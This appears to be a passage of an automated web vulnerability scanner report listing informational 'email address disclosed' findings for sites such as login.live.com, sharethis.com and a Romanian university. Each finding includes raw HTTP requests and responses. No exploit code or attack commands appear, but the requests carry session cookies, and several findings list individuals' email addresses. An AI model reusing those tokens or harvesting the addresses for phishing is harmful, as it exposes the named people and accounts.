#7=s.mr($C,(vt@tt`Zvt)`fs.hav()+q+(qs?qs:s.rq(^5)),0,id,ta);qs`g;"+"`Rm('t')`5s.p_r)s.p_r(`I`a`g}^I(qs);^Q`u($3;`j$3`c^1,`G$O1',vb`I@M=^G=s.`Q`r=s.`Q^2=`H`m`g`5s.pg)`H^w@M=`H^weo=`H^w`Q`r=`H^w`Q^2`g`5!id@Vs.tc^ztc=1;s.flush`U()}`4#7`Ctl`0o,t,n,vo`2;s.@M=$Go`I`Q^2=t"+";s.`Q`r=n;s.t($3}`5pg){`H^wco`0o){`P^s\"_\",1,$8`4$Go)`Cwd^wgs`0u@v`P^sun,1,$8`4s.t()`Cwd^wdc`0u@v`P^sun,$8`4s.t()}}@8=(`H`M`k`9`3'@Os^y0`Id=^
...[SNIP]...

23.12. https://login.live.com/login.srf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.live.com
Path:   /login.srf

Issue detail

The following email address was disclosed in the response:

Request

GET /login.srf?wa=wsignin1.0&rpsnv=11&ct=1311089470&rver=6.1.6206.0&wp=LBI&wreply=https:%2F%2Fanswers.microsoft.com%2Fen-us%2FSite%2FCompleteSignIn%3Fprovider%3Dwlid&id=273572 HTTP/1.1
Host: login.live.com
Connection: keep-alive
Referer: http://answers.microsoft.com/en-us/zune/forum/zune_install-player/mp3-conversion/efa762b3-d6d3-478f-9a59-1cd7414b0374
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Sample=17; MWTMsgr=1; MUID=E361C23374E642C998D8ABA7166A75EC; wlidperf=throughput=2&latency=1306; MSPRequ=lt=1311089374&co=1&id=273572; MSPOK=$uuid-240ff659-d409-4377-897e-e75ad2d199e3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 14574
Content-Type: text/html; charset=utf-8
Expires: Tue, 19 Jul 2011 15:37:02 GMT
Server: Microsoft-IIS/7.5
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPRequ=lt=1311089882&co=1&id=273572; path=/;version=1
Set-Cookie: MSPOK=$uuid-240ff659-d409-4377-897e-e75ad2d199e3$uuid-1895cee1-27dd-48d7-8aac-abac4dc44583$uuid-893a9771-4ec1-49d2-b1d0-11979f88bfa5; domain=login.live.com;path=/;version=1
X-Frame-Options: deny
PPServer: PPV: 30 H: BAYIDSLGN1H49 V: 0
Date: Tue, 19 Jul 2011 15:38:01 GMT
Connection: close

<!-- ServerInfo: BAYIDSLGN1H49 2011.07.09.12.24.45 Live1 Unknown LocVer:0 -->
<!-- PreprocessInfo: BTSA007:RR1BLDB073, -- Version: 11,0,18312,0 -->
<!-- RequestLCID: 1033, Market:EN-US, PrefCountry
...[SNIP]...
~^[1-9]{1}[0-9]{7}$~6123 4567~=4!!!IN~India~91~^[1-9]{1}[0-9]{9}$~81234-56789~-=5!!!IT~Italy~39~^[1-9]{1}[0-9]{8,9}$~123 456 7890~=3, =6!!!JP~Japan~81~^[A-Za-z0-9_.-]+@([A-Za-z0-9_-]+\.)+[A-Za-z0-9]+$~someone@example.com~!!!JO~Jordan~962~^[1-9]{1}[0-9]{8}$~7 7123 4567~=1, =5!!!KR~Korea~82~^[1-9]{1}[0-9]{8,9}$~10 1234 5678~=2, =6!!!KW~Kuwait~965~^[1-9]{1}[0-9]{7}$~6123 4567~=4!!!MY~Malaysia~60~^[1-9]{1}[0-9]{8}$~1-4234
...[SNIP]...

23.13. http://majornelson.com/wp-content/themes/roundhouse/style.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://majornelson.com
Path:   /wp-content/themes/roundhouse/style.css

Issue detail

The following email address was disclosed in the response:

Request

GET /wp-content/themes/roundhouse/style.css HTTP/1.1
Host: majornelson.com
Proxy-Connection: keep-alive
Referer: http://majornelson.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Tue, 19 Jul 2011 23:43:05 GMT
Content-Type: text/css
Content-Length: 8492
Last-Modified: Tue, 24 May 2011 16:21:32 GMT
Connection: keep-alive
Expires: Thu, 18 Aug 2011 23:43:05 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes

/*
Theme Name: RH MN 2011
Theme URI: http://majornelson.com
Description: Roundhouse Theme for Major Nelson
Version: 1.1
Author: Jackson Oates, jackson@roundhouseagency.com
Author URI: http://roundhouseagency.com
*/
@charset "utf-8";

/* Basic tag styles */
body {
   background-color: #252525;
   margin:0;
   font-family: Arial, Helvetica, sans-serif;
   font-size:12px;
}
#wrapp
...[SNIP]...

23.14. http://media.gamehouse.com/4/js/s_code_test.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.gamehouse.com
Path:   /4/js/s_code_test.js

Issue detail

The following email address was disclosed in the response:

Request

GET /4/js/s_code_test.js HTTP/1.1
Host: media.gamehouse.com
Proxy-Connection: keep-alive
Referer: http://support.gamehouse.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "7b5e-4a821189a5fc0"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: application/x-javascript
Age: 24023
Date: Tue, 19 Jul 2011 20:25:44 GMT
Last-Modified: Fri, 15 Jul 2011 20:00:07 GMT
Content-Length: 31582
Connection: keep-alive

/* SiteCatalyst code version: H.15.1.
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************

...[SNIP]...
`i+s.hav()+q+(qs?qs:s.rq(^C)),0,id,ta);qs`h;`Wm('t')`5s.p"
+"_r)s.p_r()}^7(qs);^y`o(@g;`k@g`L^9,`F$51',vb`R@G=^D=s.`N`g=s.`N^K=`E^z^x=s.ppu=^n=^nv1=^nv2=^nv3`h`5$t)`E^z@G=`E^zeo=`E^z`N`g=`E^z`N^K`h`5!id@Us.tc){s.tc=1;s.flush`Z()}`2$h`Atl`0o,t,n,vo`1;s.@G=@uo"
+"`R`N^K=t;s.`N`g=n;s.t(@g}`5pg){`E^zco`0o){`K@J\"_\",1,#8`2@uo)`Awd^zgs`0$P{`K@J$k1,#8`2s.t()`Awd^zdc`0$P{`K@J$k#8`2s.t()}}@2=(`E`I`X`8`4@ss@b0`Rd=
...[SNIP]...

23.15. http://media.ticketmaster.com/en-us/js/1cf39641cc0465a6e003b267636b5ebb/prototype/controls.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.ticketmaster.com
Path:   /en-us/js/1cf39641cc0465a6e003b267636b5ebb/prototype/controls.js

Issue detail

The following email address was disclosed in the response:

Request

GET /en-us/js/1cf39641cc0465a6e003b267636b5ebb/prototype/controls.js HTTP/1.1
Host: media.ticketmaster.com
Proxy-Connection: keep-alive
Referer: http://www.ticketmaster.com/event/000043582C516D43?artistid=736365&majorcatid=10001&minorcatid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GEORAN=1; SID=Y3dq6VJOUobgvd5jFa2adifFsjQPEDu1SwQqHaI3I3ywZ2h_RqrBBbchAambLEYToFNp0jdvZxmi9vEG; BID=MN5k2Ii01e9c8eT9zIsTZrTP8tnmzVQDkHCqfm3pQgSOOVA96YtvgyxM-HQGO_XI68l_ZoGoHFIlKwiEeN9v; NDMA=238; NPDMA=238; GEO_OMN=in

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 06 Jun 2011 17:11:48 GMT
ETag: "87e3-32d83d00"
Accept-Ranges: bytes
Content-Length: 34787
Content-Type: application/x-javascript
Cache-Control: public, max-age=233
Date: Tue, 19 Jul 2011 18:35:46 GMT
Connection: close

// script.aculo.us controls.js v1.9.0, Thu Dec 23 16:54:48 -0500 2010

// Copyright (c) 2005-2010 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// (c) 2005-2010 Ivan Krstic (htt
...[SNIP]...
<tdd@tddsworld.com>
...[SNIP]...

23.16. http://realnetworks.com/WorkArea/java/ektron.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://realnetworks.com
Path:   /WorkArea/java/ektron.js

Issue detail

The following email address was disclosed in the response:

Request

GET /WorkArea/java/ektron.js HTTP/1.1
Host: realnetworks.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://realnetworks.com/
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=realnetworks.com&SiteLanguage=1033; EktGUID=5deba55d-ce92-4fa1-a77a-4e1715f3a271; EkAnalytics=5deba55d-ce92-4fa1-a77a-4e1715f3a271; ASP.NET_SessionId=jujqxa5505mhmhqykjipqtbx

Response

HTTP/1.1 200 OK
Content-Length: 172238
Content-Type: application/x-javascript
Content-Location: http://realnetworks.com/WorkArea/java/ektron.js
Last-Modified: Sat, 31 Jul 2010 05:39:12 GMT
Accept-Ranges: bytes
ETag: "46c377b47230cb1:303c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 20:10:19 GMT

if ("undefined" == typeof $ektron)
{
/*
Ektron JavaScript Library
Copyright (c) 2008 Ektron, Inc.
All rights reserved

Instructions to upgrade this Ektron Li
...[SNIP]...
(Ektron.RegExp.rtrim,""); },

// method to work around bugs in jquery' offset() when element is nested inside relative/absolute elements
// from: http://www.mail-archive.com/jquery-en@googlegroups.com/msg72499.html
positionedOffset: function(elem) {
var offsetParent = elem.offsetParent(), offset = elem.offset(), position = elem.position();
if ( !/^body|html$/i.tes
...[SNIP]...

23.17. http://realnetworks.com/pressroom/index.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://realnetworks.com
Path:   /pressroom/index.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /pressroom/index.aspx HTTP/1.1
Host: realnetworks.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://realnetworks.com/
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=realnetworks.com&SiteLanguage=1033; EktGUID=5deba55d-ce92-4fa1-a77a-4e1715f3a271; EkAnalytics=5deba55d-ce92-4fa1-a77a-4e1715f3a271; ASP.NET_SessionId=jujqxa5505mhmhqykjipqtbx; __qca=P0-1586148760-1311106896347; __utma=93573022.528241780.1311106897.1311106897.1311106897.1; __utmb=93573022.1.10.1311106897; __utmc=93573022; __utmz=93573022.1311106897.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:11:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12480


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_documentH
...[SNIP]...
<a href="mailto:public_relations@real.com">public_relations@real.com</a>
...[SNIP]...

23.18. http://service.real.com/international/br/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://service.real.com
Path:   /international/br/

Issue detail

The following email address was disclosed in the response:

Request

GET /international/br/ HTTP/1.1
Host: service.real.com
Proxy-Connection: keep-alive
Referer: http://service.real.com/international/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RNsites=service02-0bKTJ8:200; __utma=54132522.596614694.1311107158.1311107158.1311107158.1; __utmb=54132522.1.10.1311107158; __utmc=54132522; __utmz=54132522.1311107158.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Server: Roxen.Challenger/1.3.122
P3P: CP="CAO NON DSP NID ADM DEV CUSi PSA OUR STP UNI PUR COM NAV INT STA"
Content-type: text/html
Last-Modified: Tue, 21 Jun 2011 18:22:01 GMT
Connection: close
MIME-Version: 1.0
Date: Tue, 19 Jul 2011 20:27:14 GMT
Content-length: 5552

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
<a href="mailto:europe-br@mailca.custhelp.com">
...[SNIP]...

23.19. http://sharethis.com/account/signin-widget  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sharethis.com
Path:   /account/signin-widget

Issue detail

The following email address was disclosed in the response:

Request

GET /account/signin-widget HTTP/1.1
Host: sharethis.com
Proxy-Connection: keep-alive
Referer: http://edge.sharethis.com/share4x/index.75b569a75a17eaa05c9e6a5ce5631fad.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspjoE3OVb2YWRTJR8rMAg==; SERVERID=i-1f43e274; __unam=8f891fa-13142cc749b-8ad1c19-2; __utma=79367510.1750911955.1311085721.1311085721.1311085721.1; __utmb=79367510.1.10.1311085721; __utmc=79367510; __utmz=79367510.1311085721.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:28:35 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Vary: Accept-Encoding
p3p: policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Length: 14139
Content-Type: text/html; charset=UTF-8
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml" >
<
...[SNIP]...
<meta property="og:email" content="feedback@sharethis.com"/>
...[SNIP]...

23.20. http://sharethis.com/ext/adapter/ext/ext-base.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sharethis.com
Path:   /ext/adapter/ext/ext-base.js

Issue detail

The following email address was disclosed in the response:

Request

GET /ext/adapter/ext/ext-base.js HTTP/1.1
Host: sharethis.com
Proxy-Connection: keep-alive
Referer: http://sharethis.com/privacy
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspjoE3OVb2YWRTJR8rMAg==; SERVERID=i-1f43e274

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:28:32 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 29 Jun 2011 18:18:19 GMT
ETag: "10d1a0-7d91-cf13b0c0"
Accept-Ranges: bytes
Vary: Accept-Encoding
p3p: policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Length: 32145
Content-Type: application/x-javascript
Connection: close

/*
* Ext JS Library 3.0.0
* Copyright(c) 2006-2009 Ext JS, LLC
* licensing@extjs.com
* http://www.extjs.com/license
*/
window.undefined=window.undefined;Ext={version:"3.0"};Ext.apply=function(d,e,b){if(b){Ext.apply(d,b)}if(d&&e&&typeof e=="object"){for(var a in e){d[a]=e[a]}}return
...[SNIP]...

23.21. http://sharethis.com/ext/ext-all.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sharethis.com
Path:   /ext/ext-all.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /ext/ext-all.js HTTP/1.1
Host: sharethis.com
Proxy-Connection: keep-alive
Referer: http://sharethis.com/privacy
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspjoE3OVb2YWRTJR8rMAg==; SERVERID=i-1f43e274

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:28:32 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 29 Jun 2011 18:18:19 GMT
ETag: "10d1a8-98730-cf13b0c0"
Accept-Ranges: bytes
Vary: Accept-Encoding
p3p: policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Type: application/x-javascript
Connection: close
Content-Length: 624432

/*
* Ext JS Library 3.0.0
* Copyright(c) 2006-2009 Ext JS, LLC
* licensing@extjs.com
* http://www.extjs.com/license
*/
Ext.DomHelper=function(){var s=null,j=/^(?:br|frame|hr|img|input|link|meta|range|spacer|wbr|area|param|col)$/i,l=/^table|tbody|tr|td$/i,p,m="afterbegin",n="afterend
...[SNIP]...
\/([\-\w]+\.)+\w{2,3}(\/[%\-\w]+(\.\w{2,})?)*(([\w\-\.\?\\\/+@&#;`~=%!]*)(\.\w{2,})?)*\/?)/i;return{email:function(e){return b.test(e)},emailText:'This field should be an e-mail address in the format "user@example.com"',emailMask:/[a-z0-9_\.\-@]/i,url:function(e){return a.test(e)},urlText:'This field should be a URL in the format "http://www.example.com"',alpha:function(e){return c.test(e)},alphaText:"This field sh
...[SNIP]...

23.22. http://sharethis.com/ext/resources/css/ext-all.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sharethis.com
Path:   /ext/resources/css/ext-all.css

Issue detail

The following email address was disclosed in the response:

Request

GET /ext/resources/css/ext-all.css HTTP/1.1
Host: sharethis.com
Proxy-Connection: keep-alive
Referer: http://sharethis.com/privacy
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspjoE3OVb2YWRTJR8rMAg==; SERVERID=i-1f43e274

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:28:32 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 29 Jun 2011 18:18:19 GMT
ETag: "10d1e1-22f0c-cf13b0c0"
Accept-Ranges: bytes
Vary: Accept-Encoding
p3p: policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Length: 143116
Content-Type: text/css
Connection: close

/*!
* Ext JS Library 3.0.0
* Copyright(c) 2006-2009 Ext JS, LLC
* licensing@extjs.com
* http://www.extjs.com/license
*/
html,body,div,dl,dt,dd,ul,ol,li,h1,h2,h3,h4,h5,h6,pre,form,fieldset,input,p,blockquote,th,td{margin:0;padding:0;}img,body,html{border:0;}address,caption,cite,code,d
...[SNIP]...

23.23. http://sharethis.com/privacy  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sharethis.com
Path:   /privacy

Issue detail

The following email address was disclosed in the response:

Request

GET /privacy HTTP/1.1
Host: sharethis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspjoE3OVb2YWRTJR8rMAg==

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:28:32 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Vary: Accept-Encoding
p3p: policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Length: 33617
Content-Type: text/html; charset=UTF-8
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml" >

...[SNIP]...
<meta property="og:email" content="feedback@sharethis.com"/>
...[SNIP]...

23.24. http://sharethis.com/register  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sharethis.com
Path:   /register

Issue detail

The following email address was disclosed in the response:

Request

GET /register HTTP/1.1
Host: sharethis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspjoE3OVb2YWRTJR8rMAg==; SERVERID=i-1f43e274; __uset=yes; __unam=8f891fa-13142cc749b-8ad1c19-4; __utma=79367510.1750911955.1311085721.1311085721.1311085721.1; __utmb=79367510.3.9.1311085721; __utmc=79367510; __utmz=79367510.1311085721.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:28:41 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Vary: Accept-Encoding
p3p: policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Length: 13025
Content-Type: text/html; charset=UTF-8
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml" >
<
...[SNIP]...
<meta property="og:email" content="feedback@sharethis.com"/>
...[SNIP]...

23.25. http://umfcluj.ro/js/jquery.emptyOnFocus.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://umfcluj.ro
Path:   /js/jquery.emptyOnFocus.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/jquery.emptyOnFocus.js HTTP/1.1
Host: umfcluj.ro
Proxy-Connection: keep-alive
Referer: http://umfcluj.ro/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uv0adfzgil2a3n55ieywykip

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Thu, 24 Jul 2008 09:23:50 GMT
Accept-Ranges: bytes
ETag: "0d765fb6eedc81:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:12:29 GMT
Content-Length: 1271

/*
* @author Andrei Eftimie
* @email andrei.eftimie@netlogiq.ro
* @copyright (c) Netlogiq
* @web http://www.netlogiq.ro
* http://www.netlogiq.com
*
* Required Markup
* ---------------
* <div class="div">
...[SNIP]...

23.26. http://umfcluj.ro/js/jquery.hoverIntent.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://umfcluj.ro
Path:   /js/jquery.hoverIntent.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/jquery.hoverIntent.js HTTP/1.1
Host: umfcluj.ro
Proxy-Connection: keep-alive
Referer: http://umfcluj.ro/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uv0adfzgil2a3n55ieywykip

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Mon, 05 May 2008 09:12:42 GMT
Accept-Ranges: bytes
ETag: "021312c90aec81:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:12:29 GMT
Content-Length: 1609

.../**
* hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+
* <http://cherne.net/brian/resources/jquery.hoverIntent.html>
*
* @param f onMouseOver function || An object with configuration options
* @par
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

23.27. http://umfcluj.ro/lista.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://umfcluj.ro
Path:   /lista.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /lista.aspx?t=Doctorat-Prezentare HTTP/1.1
Host: umfcluj.ro
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uv0adfzgil2a3n55ieywykip; __utma=234819994.469475746.1311095567.1311095567.1311095567.1; __utmb=234819994.4.10.1311095567; __utmc=234819994; __utmz=234819994.1311095567.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:13:14 GMT
Content-Length: 84035


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Universitatea de Medicina si Farmacie Iuliu Hatieganu, Cluj-Napoca</title>
<meta n
...[SNIP]...
<br />
e-mail: rbadea@umfcluj.ro<br />
...[SNIP]...
<br />
e-mail: dionescu@umfcluj.ro<br />
...[SNIP]...
<br />
e-mail: cgheran@umfcluj.ro<br />
...[SNIP]...
<br />
e-mail: scd@umfcluj.ro <br />
...[SNIP]...
<br />
e-mail: andreea.cziriek@umfcluj.ro<br />
...[SNIP]...

23.28. http://umfcluj.ro/lista.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://umfcluj.ro
Path:   /lista.aspx

Issue detail

